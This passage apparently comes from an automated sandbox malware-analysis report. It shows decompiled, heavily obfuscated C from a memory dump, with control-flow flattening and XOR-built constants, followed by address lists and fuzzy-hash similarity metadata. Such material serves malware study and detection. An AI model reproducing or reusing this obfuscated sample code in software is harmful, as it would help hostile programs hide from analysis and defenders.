                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x0004e188;
                                                                                                                                                                                                                    				_v32 = 0x7ced8c;
                                                                                                                                                                                                                    				_v32 = _v32 + 0x300c;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x0075a2bd;
                                                                                                                                                                                                                    				while(_t171 != 0x626f944) {
                                                                                                                                                                                                                    					if(_t171 == 0x8072dbc) {
                                                                                                                                                                                                                    						E00A773B3(_v64, _v68,  &_v28, _t169, _v72, _v76);
                                                                                                                                                                                                                    						_t208 = _t208 + 0x10;
                                                                                                                                                                                                                    						_t171 = 0x899d49a;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						if(_t171 == 0x899d49a) {
                                                                                                                                                                                                                    							__eflags = E00A629F1(_v36, _v40,  &_v28, _t202 + 0x28);
                                                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                                                    								_t171 = 0xfd5820d;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t171 == 0x8e5948a) {
                                                                                                                                                                                                                    								__eflags = E00A629F1(_v84, _v44,  &_v28, _t202 + 8);
                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                    									_t171 = 0x626f944;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t171 == 0xae4a45f) {
                                                                                                                                                                                                                    									__eflags = E00A629F1(_v48, _v52,  &_v28, _t202 + 0x20);
                                                                                                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                                                                                                    										_t171 = 0x8e5948a;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t171 == 0xbf6a83e) {
                                                                                                                                                                                                                    										_t171 = 0x8072dbc;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t171 != 0xfd5820d) {
                                                                                                                                                                                                                    											L19:
                                                                                                                                                                                                                    											__eflags = _t171 - 0xc6f7ee9;
                                                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											if(E00A629F1(_v88, _v80,  &_v28, _t202 + 0x14) != 0) {
                                                                                                                                                                                                                    												_t171 = 0xae4a45f;
                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					return _t201;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				_t153 = E00A7223A(_v56,  &_v28, __eflags, _t202 + 0xc, _v60, _v32);
                                                                                                                                                                                                                    				_t208 = _t208 + 0xc;
                                                                                                                                                                                                                    				__eflags = _t153;
                                                                                                                                                                                                                    				_t201 =  !=  ? 1 : _t201;
                                                                                                                                                                                                                    				_t171 = 0xc6f7ee9;
                                                                                                                                                                                                                    				goto L19;
                                                                                                                                                                                                                    			}






























                                                                                                                                                                                                                    0x00a6ad6e
                                                                                                                                                                                                                    0x00a6ad72
                                                                                                                                                                                                                    0x00a6ad75
                                                                                                                                                                                                                    0x00a6ad79
                                                                                                                                                                                                                    0x00a6ad7a
                                                                                                                                                                                                                    0x00a6ad7c
                                                                                                                                                                                                                    0x00a6ad81
                                                                                                                                                                                                                    0x00a6ad89
                                                                                                                                                                                                                    0x00a6ad93
                                                                                                                                                                                                                    0x00a6ad95
                                                                                                                                                                                                                    0x00a6ad9c
                                                                                                                                                                                                                    0x00a6ad9d
                                                                                                                                                                                                                    0x00a6ada1
                                                                                                                                                                                                                    0x00a6ada6
                                                                                                                                                                                                                    0x00a6adae
                                                                                                                                                                                                                    0x00a6adb6
                                                                                                                                                                                                                    0x00a6adbe
                                                                                                                                                                                                                    0x00a6adc6
                                                                                                                                                                                                                    0x00a6adce
                                                                                                                                                                                                                    0x00a6addd
                                                                                                                                                                                                                    0x00a6ade6
                                                                                                                                                                                                                    0x00a6adea
                                                                                                                                                                                                                    0x00a6adf2
                                                                                                                                                                                                                    0x00a6adfa
                                                                                                                                                                                                                    0x00a6ae0a
                                                                                                                                                                                                                    0x00a6ae0e
                                                                                                                                                                                                                    0x00a6ae16
                                                                                                                                                                                                                    0x00a6ae22
                                                                                                                                                                                                                    0x00a6ae27
                                                                                                                                                                                                                    0x00a6ae2d
                                                                                                                                                                                                                    0x00a6ae35
                                                                                                                                                                                                                    0x00a6ae3d
                                                                                                                                                                                                                    0x00a6ae45
                                                                                                                                                                                                                    0x00a6ae4d
                                                                                                                                                                                                                    0x00a6ae59
                                                                                                                                                                                                                    0x00a6ae5c
                                                                                                                                                                                                                    0x00a6ae65
                                                                                                                                                                                                                    0x00a6ae69
                                                                                                                                                                                                                    0x00a6ae71
                                                                                                                                                                                                                    0x00a6ae79
                                                                                                                                                                                                                    0x00a6ae81
                                                                                                                                                                                                                    0x00a6ae86
                                                                                                                                                                                                                    0x00a6ae8b
                                                                                                                                                                                                                    0x00a6ae93
                                                                                                                                                                                                                    0x00a6ae9b
                                                                                                                                                                                                                    0x00a6aea3
                                                                                                                                                                                                                    0x00a6aeab
                                                                                                                                                                                                                    0x00a6aeb3
                                                                                                                                                                                                                    0x00a6aeb8
                                                                                                                                                                                                                    0x00a6aebc
                                                                                                                                                                                                                    0x00a6aec4
                                                                                                                                                                                                                    0x00a6aecc
                                                                                                                                                                                                                    0x00a6aed4
                                                                                                                                                                                                                    0x00a6aed9
                                                                                                                                                                                                                    0x00a6aee1
                                                                                                                                                                                                                    0x00a6aee9
                                                                                                                                                                                                                    0x00a6aef1
                                                                                                                                                                                                                    0x00a6aef9
                                                                                                                                                                                                                    0x00a6af01
                                                                                                                                                                                                                    0x00a6af0e
                                                                                                                                                                                                                    0x00a6af17
                                                                                                                                                                                                                    0x00a6af1f
                                                                                                                                                                                                                    0x00a6af27
                                                                                                                                                                                                                    0x00a6af2f
                                                                                                                                                                                                                    0x00a6af37
                                                                                                                                                                                                                    0x00a6af3c
                                                                                                                                                                                                                    0x00a6af44
                                                                                                                                                                                                                    0x00a6af4c
                                                                                                                                                                                                                    0x00a6af54
                                                                                                                                                                                                                    0x00a6af5c
                                                                                                                                                                                                                    0x00a6af6a
                                                                                                                                                                                                                    0x00a6b05b
                                                                                                                                                                                                                    0x00a6b060
                                                                                                                                                                                                                    0x00a6b063
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6af70
                                                                                                                                                                                                                    0x00a6af76
                                                                                                                                                                                                                    0x00a6b037
                                                                                                                                                                                                                    0x00a6b039
                                                                                                                                                                                                                    0x00a6b03b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b03b
                                                                                                                                                                                                                    0x00a6af7c
                                                                                                                                                                                                                    0x00a6af82
                                                                                                                                                                                                                    0x00a6b010
                                                                                                                                                                                                                    0x00a6b012
                                                                                                                                                                                                                    0x00a6b018
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6b018
                                                                                                                                                                                                                    0x00a6af84
                                                                                                                                                                                                                    0x00a6af8a
                                                                                                                                                                                                                    0x00a6afe6
                                                                                                                                                                                                                    0x00a6afe8
                                                                                                                                                                                                                    0x00a6afee
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6afee
                                                                                                                                                                                                                    0x00a6af8c
                                                                                                                                                                                                                    0x00a6af92
                                                                                                                                                                                                                    0x00a6afc7
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6af94
                                                                                                                                                                                                                    0x00a6af9a
                                                                                                                                                                                                                    0x00a6b096
                                                                                                                                                                                                                    0x00a6b096
                                                                                                                                                                                                                    0x00a6b09c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6afa0
                                                                                                                                                                                                                    0x00a6afba
                                                                                                                                                                                                                    0x00a6afc0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a6afc0
                                                                                                                                                                                                                    0x00a6afba
                                                                                                                                                                                                                    0x00a6af9a
                                                                                                                                                                                                                    0x00a6af92
                                                                                                                                                                                                                    0x00a6af8a
                                                                                                                                                                                                                    0x00a6af82
                                                                                                                                                                                                                    0x00a6af76
                                                                                                                                                                                                                    0x00a6b0ab
                                                                                                                                                                                                                    0x00a6b0ab
                                                                                                                                                                                                                    0x00a6b081
                                                                                                                                                                                                                    0x00a6b088
                                                                                                                                                                                                                    0x00a6b08c
                                                                                                                                                                                                                    0x00a6b08e
                                                                                                                                                                                                                    0x00a6b091
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 0[$7U$Cvu$c$lJ
                                                                                                                                                                                                                    • API String ID: 0-1766918013
                                                                                                                                                                                                                    • Opcode ID: 3094135557e97a1ebd08a93144ae0a5e3041f964943c8f879094d8a4b2a38a3d
                                                                                                                                                                                                                    • Instruction ID: 380eef1f34c56fae3137d924e2dfc0c87b2ff34d2a0b1c923c2d8e68482603a5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3094135557e97a1ebd08a93144ae0a5e3041f964943c8f879094d8a4b2a38a3d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0481C9B21083019FC358CF22C58581BBBF5FBC5758F10892EF29696260C775D94A8F97
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                    			E00A78D7C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                    				char _v556;
                                                                                                                                                                                                                    				intOrPtr _v592;
                                                                                                                                                                                                                    				char _v616;
                                                                                                                                                                                                                    				signed int _v620;
                                                                                                                                                                                                                    				signed int _v624;
                                                                                                                                                                                                                    				signed int _v628;
                                                                                                                                                                                                                    				signed int _v632;
                                                                                                                                                                                                                    				signed int _v636;
                                                                                                                                                                                                                    				signed int _v640;
                                                                                                                                                                                                                    				signed int _v644;
                                                                                                                                                                                                                    				signed int _v648;
                                                                                                                                                                                                                    				signed int _v652;
                                                                                                                                                                                                                    				signed int _v656;
                                                                                                                                                                                                                    				signed int _v660;
                                                                                                                                                                                                                    				signed int _v664;
                                                                                                                                                                                                                    				unsigned int _v668;
                                                                                                                                                                                                                    				void* _t135;
                                                                                                                                                                                                                    				signed int _t152;
                                                                                                                                                                                                                    				signed int _t155;
                                                                                                                                                                                                                    				void* _t160;
                                                                                                                                                                                                                    				signed int _t166;
                                                                                                                                                                                                                    				intOrPtr _t186;
                                                                                                                                                                                                                    				signed int _t187;
                                                                                                                                                                                                                    				signed int _t188;
                                                                                                                                                                                                                    				signed int _t189;
                                                                                                                                                                                                                    				signed int* _t193;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t186 = _a12;
                                                                                                                                                                                                                    				_push(E00A676AB);
                                                                                                                                                                                                                    				_push(_t186);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t135);
                                                                                                                                                                                                                    				_v620 = 0xee26c2;
                                                                                                                                                                                                                    				_t193 =  &(( &_v668)[6]);
                                                                                                                                                                                                                    				_t160 = 0xe3fcf0f;
                                                                                                                                                                                                                    				_t187 = 0x3e;
                                                                                                                                                                                                                    				_v620 = _v620 / _t187;
                                                                                                                                                                                                                    				_v620 = _v620 ^ 0x0003d757;
                                                                                                                                                                                                                    				_v628 = 0xabd011;
                                                                                                                                                                                                                    				_v628 = _v628 << 4;
                                                                                                                                                                                                                    				_v628 = _v628 ^ 0x0abf8453;
                                                                                                                                                                                                                    				_v668 = 0x3656a9;
                                                                                                                                                                                                                    				_v668 = _v668 + 0xffffba02;
                                                                                                                                                                                                                    				_v668 = _v668 << 6;
                                                                                                                                                                                                                    				_v668 = _v668 >> 6;
                                                                                                                                                                                                                    				_v668 = _v668 ^ 0x0039aa3c;
                                                                                                                                                                                                                    				_v624 = 0xf3e3d3;
                                                                                                                                                                                                                    				_v624 = _v624 + 0xfffff1df;
                                                                                                                                                                                                                    				_v624 = _v624 ^ 0x00f6a2bc;
                                                                                                                                                                                                                    				_v664 = 0x54aaf2;
                                                                                                                                                                                                                    				_v664 = _v664 / _t187;
                                                                                                                                                                                                                    				_t188 = 0x3a;
                                                                                                                                                                                                                    				_v664 = _v664 / _t188;
                                                                                                                                                                                                                    				_v664 = _v664 >> 0xe;
                                                                                                                                                                                                                    				_v664 = _v664 ^ 0x0005a7d6;
                                                                                                                                                                                                                    				_v632 = 0x163482;
                                                                                                                                                                                                                    				_v632 = _v632 << 0xd;
                                                                                                                                                                                                                    				_v632 = _v632 ^ 0xc698dbd0;
                                                                                                                                                                                                                    				_v644 = 0xc3e8de;
                                                                                                                                                                                                                    				_v644 = _v644 + 0xffff1944;
                                                                                                                                                                                                                    				_v644 = _v644 << 4;
                                                                                                                                                                                                                    				_v644 = _v644 ^ 0x0c3a5465;
                                                                                                                                                                                                                    				_v660 = 0x2a889e;
                                                                                                                                                                                                                    				_v660 = _v660 + 0xffff919a;
                                                                                                                                                                                                                    				_v660 = _v660 ^ 0xf70d15ab;
                                                                                                                                                                                                                    				_v660 = _v660 + 0x8300;
                                                                                                                                                                                                                    				_v660 = _v660 ^ 0xf72877ba;
                                                                                                                                                                                                                    				_v652 = 0x2a64c0;
                                                                                                                                                                                                                    				_t189 = 0x2b;
                                                                                                                                                                                                                    				_v652 = _v652 * 0x49;
                                                                                                                                                                                                                    				_v652 = _v652 + 0xffff062b;
                                                                                                                                                                                                                    				_v652 = _v652 * 0x5c;
                                                                                                                                                                                                                    				_v652 = _v652 ^ 0x57d40a79;
                                                                                                                                                                                                                    				_v636 = 0x5d5026;
                                                                                                                                                                                                                    				_v636 = _v636 + 0xffffc6d9;
                                                                                                                                                                                                                    				_v636 = _v636 / _t189;
                                                                                                                                                                                                                    				_v636 = _v636 ^ 0x00048591;
                                                                                                                                                                                                                    				_v648 = 0x2a46b8;
                                                                                                                                                                                                                    				_v648 = _v648 ^ 0xf081b311;
                                                                                                                                                                                                                    				_v648 = _v648 << 6;
                                                                                                                                                                                                                    				_v648 = _v648 << 3;
                                                                                                                                                                                                                    				_v648 = _v648 ^ 0x57e66c38;
                                                                                                                                                                                                                    				_v656 = 0xb6b566;
                                                                                                                                                                                                                    				_v656 = _v656 + 0xffff3662;
                                                                                                                                                                                                                    				_v656 = _v656 << 0xd;
                                                                                                                                                                                                                    				_v656 = _v656 | 0x950a005c;
                                                                                                                                                                                                                    				_v656 = _v656 ^ 0xbd7c1035;
                                                                                                                                                                                                                    				_t190 = _v632;
                                                                                                                                                                                                                    				_v640 = 0x5dce49;
                                                                                                                                                                                                                    				_v640 = _v640 | 0xb87efc90;
                                                                                                                                                                                                                    				_v640 = _v640 * 0x30;
                                                                                                                                                                                                                    				_v640 = _v640 ^ 0x97f49e30;
                                                                                                                                                                                                                    				L1:
                                                                                                                                                                                                                    				while(_t160 != 0xe0cc6) {
                                                                                                                                                                                                                    					if(_t160 != 0xa464e9) {
                                                                                                                                                                                                                    						if(_t160 == 0x922572f) {
                                                                                                                                                                                                                    							_t155 = E00A676AB(_t160,  &_v556,  &_v616);
                                                                                                                                                                                                                    							asm("sbb ecx, ecx");
                                                                                                                                                                                                                    							_t166 =  ~_t155 & 0x0509d0e4;
                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t160 == 0x97bf1dc) {
                                                                                                                                                                                                                    								return E00A6E2BD(_t190, _v648, _v656, _v640);
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(_t160 == 0xe3fcf0f) {
                                                                                                                                                                                                                    								_v592 = _t186;
                                                                                                                                                                                                                    								_t160 = 0xa464e9;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t160 != 0xe85c2c0) {
                                                                                                                                                                                                                    									L16:
                                                                                                                                                                                                                    									if(_t160 != 0xe2c2310) {
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										return _t155;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									L20:
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									_t155 = E00A68F10(_v644, _v660, _t190, _v652, _v636,  &_v556);
                                                                                                                                                                                                                    									_t193 =  &(_t193[4]);
                                                                                                                                                                                                                    									asm("sbb ecx, ecx");
                                                                                                                                                                                                                    									_t166 =  ~_t155 & 0xffa66553;
                                                                                                                                                                                                                    									L8:
                                                                                                                                                                                                                    									_t160 = _t166 + 0x97bf1dc;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t152 = E00A69FBE(_t160, _v620);
                                                                                                                                                                                                                    					_t190 = _t152;
                                                                                                                                                                                                                    					_t193 = _t193 - 0xc + 0xc;
                                                                                                                                                                                                                    					if(_t152 != 0xffffffff) {
                                                                                                                                                                                                                    						_t160 = 0xe0cc6;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					return _t152;
                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				_v556 = 0x22c;
                                                                                                                                                                                                                    				if(E00A67900( &_v556, _v664, _t190, _v632) == 0) {
                                                                                                                                                                                                                    					_t160 = 0x97bf1dc;
                                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                    					_t160 = 0x922572f;
                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				goto L20;
                                                                                                                                                                                                                    			}





























                                                                                                                                                                                                                    0x00a78d86
                                                                                                                                                                                                                    0x00a78d8d
                                                                                                                                                                                                                    0x00a78d92
                                                                                                                                                                                                                    0x00a78d93
                                                                                                                                                                                                                    0x00a78d9a
                                                                                                                                                                                                                    0x00a78da1
                                                                                                                                                                                                                    0x00a78da2
                                                                                                                                                                                                                    0x00a78da3
                                                                                                                                                                                                                    0x00a78da8
                                                                                                                                                                                                                    0x00a78db0
                                                                                                                                                                                                                    0x00a78db9
                                                                                                                                                                                                                    0x00a78dc0
                                                                                                                                                                                                                    0x00a78dc5
                                                                                                                                                                                                                    0x00a78dc9
                                                                                                                                                                                                                    0x00a78dd1
                                                                                                                                                                                                                    0x00a78dd9
                                                                                                                                                                                                                    0x00a78dde
                                                                                                                                                                                                                    0x00a78de6
                                                                                                                                                                                                                    0x00a78dee
                                                                                                                                                                                                                    0x00a78df6
                                                                                                                                                                                                                    0x00a78dfb
                                                                                                                                                                                                                    0x00a78e00
                                                                                                                                                                                                                    0x00a78e08
                                                                                                                                                                                                                    0x00a78e10
                                                                                                                                                                                                                    0x00a78e18
                                                                                                                                                                                                                    0x00a78e20
                                                                                                                                                                                                                    0x00a78e30
                                                                                                                                                                                                                    0x00a78e3a
                                                                                                                                                                                                                    0x00a78e3f
                                                                                                                                                                                                                    0x00a78e45
                                                                                                                                                                                                                    0x00a78e4a
                                                                                                                                                                                                                    0x00a78e52
                                                                                                                                                                                                                    0x00a78e5a
                                                                                                                                                                                                                    0x00a78e5f
                                                                                                                                                                                                                    0x00a78e67
                                                                                                                                                                                                                    0x00a78e6f
                                                                                                                                                                                                                    0x00a78e77
                                                                                                                                                                                                                    0x00a78e7c
                                                                                                                                                                                                                    0x00a78e84
                                                                                                                                                                                                                    0x00a78e8c
                                                                                                                                                                                                                    0x00a78e94
                                                                                                                                                                                                                    0x00a78e9c
                                                                                                                                                                                                                    0x00a78ea4
                                                                                                                                                                                                                    0x00a78eac
                                                                                                                                                                                                                    0x00a78eb9
                                                                                                                                                                                                                    0x00a78eba
                                                                                                                                                                                                                    0x00a78ebe
                                                                                                                                                                                                                    0x00a78ecb
                                                                                                                                                                                                                    0x00a78ecf
                                                                                                                                                                                                                    0x00a78ed7
                                                                                                                                                                                                                    0x00a78edf
                                                                                                                                                                                                                    0x00a78eed
                                                                                                                                                                                                                    0x00a78ef1
                                                                                                                                                                                                                    0x00a78ef9
                                                                                                                                                                                                                    0x00a78f01
                                                                                                                                                                                                                    0x00a78f09
                                                                                                                                                                                                                    0x00a78f0e
                                                                                                                                                                                                                    0x00a78f13
                                                                                                                                                                                                                    0x00a78f1b
                                                                                                                                                                                                                    0x00a78f23
                                                                                                                                                                                                                    0x00a78f2b
                                                                                                                                                                                                                    0x00a78f35
                                                                                                                                                                                                                    0x00a78f42
                                                                                                                                                                                                                    0x00a78f4a
                                                                                                                                                                                                                    0x00a78f4e
                                                                                                                                                                                                                    0x00a78f56
                                                                                                                                                                                                                    0x00a78f63
                                                                                                                                                                                                                    0x00a78f67
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a78f6f
                                                                                                                                                                                                                    0x00a78f7d
                                                                                                                                                                                                                    0x00a78f89
                                                                                                                                                                                                                    0x00a78ff0
                                                                                                                                                                                                                    0x00a78ff9
                                                                                                                                                                                                                    0x00a78ffb
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a78f8b
                                                                                                                                                                                                                    0x00a78f8d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a79080
                                                                                                                                                                                                                    0x00a78f99
                                                                                                                                                                                                                    0x00a78fd8
                                                                                                                                                                                                                    0x00a78fdc
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a78f9b
                                                                                                                                                                                                                    0x00a78fa1
                                                                                                                                                                                                                    0x00a7905e
                                                                                                                                                                                                                    0x00a79064
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a78fa7
                                                                                                                                                                                                                    0x00a78fc0
                                                                                                                                                                                                                    0x00a78fc5
                                                                                                                                                                                                                    0x00a78fcc
                                                                                                                                                                                                                    0x00a78fce
                                                                                                                                                                                                                    0x00a78fd4
                                                                                                                                                                                                                    0x00a78fd4
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a78fd4
                                                                                                                                                                                                                    0x00a78fa1
                                                                                                                                                                                                                    0x00a78f99
                                                                                                                                                                                                                    0x00a78f89
                                                                                                                                                                                                                    0x00a79016
                                                                                                                                                                                                                    0x00a7901b
                                                                                                                                                                                                                    0x00a7901d
                                                                                                                                                                                                                    0x00a79023
                                                                                                                                                                                                                    0x00a79025
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a79025
                                                                                                                                                                                                                    0x00a7908b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7908b
                                                                                                                                                                                                                    0x00a7903c
                                                                                                                                                                                                                    0x00a79050
                                                                                                                                                                                                                    0x00a7905c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a79052
                                                                                                                                                                                                                    0x00a79052
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a79052
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: &P]$/W"$/W"$8lW$\
                                                                                                                                                                                                                    • API String ID: 0-3911752462
                                                                                                                                                                                                                    • Opcode ID: 44f95e6f8a5c2fc9e9b9dce21809deafba55062ac9246a3254cc02c99c07fd0c
                                                                                                                                                                                                                    • Instruction ID: 10b97d07bf256aa626201e533a881b090b4bb00e2a5363003ff26d76b580dd88
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44f95e6f8a5c2fc9e9b9dce21809deafba55062ac9246a3254cc02c99c07fd0c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A57175711183019FC758DF25C89941FBBE1FBC4718F508A1EF5AA86260DBB48A0ACF87
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                    			E00A7DD54() {
                                                                                                                                                                                                                    				char _v524;
                                                                                                                                                                                                                    				signed int _v528;
                                                                                                                                                                                                                    				signed int _v532;
                                                                                                                                                                                                                    				signed int _v536;
                                                                                                                                                                                                                    				signed int _v540;
                                                                                                                                                                                                                    				signed int _v544;
                                                                                                                                                                                                                    				signed int _v548;
                                                                                                                                                                                                                    				signed int _v552;
                                                                                                                                                                                                                    				signed int _v556;
                                                                                                                                                                                                                    				signed int _v560;
                                                                                                                                                                                                                    				signed int _v564;
                                                                                                                                                                                                                    				signed int _v568;
                                                                                                                                                                                                                    				signed int _v572;
                                                                                                                                                                                                                    				signed int _v576;
                                                                                                                                                                                                                    				signed int _v580;
                                                                                                                                                                                                                    				signed int _v584;
                                                                                                                                                                                                                    				signed int _v588;
                                                                                                                                                                                                                    				void* _t161;
                                                                                                                                                                                                                    				short* _t166;
                                                                                                                                                                                                                    				void* _t170;
                                                                                                                                                                                                                    				signed int _t198;
                                                                                                                                                                                                                    				signed int _t199;
                                                                                                                                                                                                                    				signed int _t200;
                                                                                                                                                                                                                    				signed int _t201;
                                                                                                                                                                                                                    				signed int _t202;
                                                                                                                                                                                                                    				signed int* _t205;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t205 =  &_v588;
                                                                                                                                                                                                                    				_v560 = 0xc54988;
                                                                                                                                                                                                                    				_v560 = _v560 + 0xffff11ef;
                                                                                                                                                                                                                    				_t170 = 0xd032026;
                                                                                                                                                                                                                    				_v560 = _v560 >> 4;
                                                                                                                                                                                                                    				_v560 = _v560 ^ 0x000b53aa;
                                                                                                                                                                                                                    				_v544 = 0xe660c6;
                                                                                                                                                                                                                    				_v544 = _v544 + 0x3da3;
                                                                                                                                                                                                                    				_v544 = _v544 ^ 0x00e868c7;
                                                                                                                                                                                                                    				_v576 = 0xb26d4b;
                                                                                                                                                                                                                    				_t198 = 0x1b;
                                                                                                                                                                                                                    				_v576 = _v576 / _t198;
                                                                                                                                                                                                                    				_v576 = _v576 << 6;
                                                                                                                                                                                                                    				_v576 = _v576 | 0x1672f167;
                                                                                                                                                                                                                    				_v576 = _v576 ^ 0x17f45258;
                                                                                                                                                                                                                    				_v556 = 0x68032d;
                                                                                                                                                                                                                    				_v556 = _v556 << 6;
                                                                                                                                                                                                                    				_v556 = _v556 + 0x787b;
                                                                                                                                                                                                                    				_v556 = _v556 ^ 0x1a0f4ee6;
                                                                                                                                                                                                                    				_v564 = 0xa651be;
                                                                                                                                                                                                                    				_v564 = _v564 ^ 0xa2d47b32;
                                                                                                                                                                                                                    				_t199 = 0x3c;
                                                                                                                                                                                                                    				_v564 = _v564 * 0x43;
                                                                                                                                                                                                                    				_v564 = _v564 ^ 0x83e042c5;
                                                                                                                                                                                                                    				_v536 = 0x2650bd;
                                                                                                                                                                                                                    				_v536 = _v536 ^ 0x34267315;
                                                                                                                                                                                                                    				_v536 = _v536 ^ 0x340cba9d;
                                                                                                                                                                                                                    				_v552 = 0x3e7d43;
                                                                                                                                                                                                                    				_v552 = _v552 * 0x79;
                                                                                                                                                                                                                    				_v552 = _v552 ^ 0x1d89387e;
                                                                                                                                                                                                                    				_v588 = 0xfe4391;
                                                                                                                                                                                                                    				_v588 = _v588 << 0x10;
                                                                                                                                                                                                                    				_v588 = _v588 / _t199;
                                                                                                                                                                                                                    				_t200 = 0x6a;
                                                                                                                                                                                                                    				_v588 = _v588 / _t200;
                                                                                                                                                                                                                    				_v588 = _v588 ^ 0x000bc98c;
                                                                                                                                                                                                                    				_v572 = 0x2b585f;
                                                                                                                                                                                                                    				_v572 = _v572 ^ 0x643d20ac;
                                                                                                                                                                                                                    				_v572 = _v572 | 0x606718d2;
                                                                                                                                                                                                                    				_v572 = _v572 + 0x71f4;
                                                                                                                                                                                                                    				_v572 = _v572 ^ 0x64733f73;
                                                                                                                                                                                                                    				_v568 = 0xc34a70;
                                                                                                                                                                                                                    				_v568 = _v568 | 0xc02999f6;
                                                                                                                                                                                                                    				_v568 = _v568 + 0xa0c0;
                                                                                                                                                                                                                    				_v568 = _v568 ^ 0xc0e46847;
                                                                                                                                                                                                                    				_v580 = 0xb7214d;
                                                                                                                                                                                                                    				_v580 = _v580 | 0x29adf435;
                                                                                                                                                                                                                    				_v580 = _v580 ^ 0xbd02752b;
                                                                                                                                                                                                                    				_v580 = _v580 + 0x197;
                                                                                                                                                                                                                    				_v580 = _v580 ^ 0x94ba72e3;
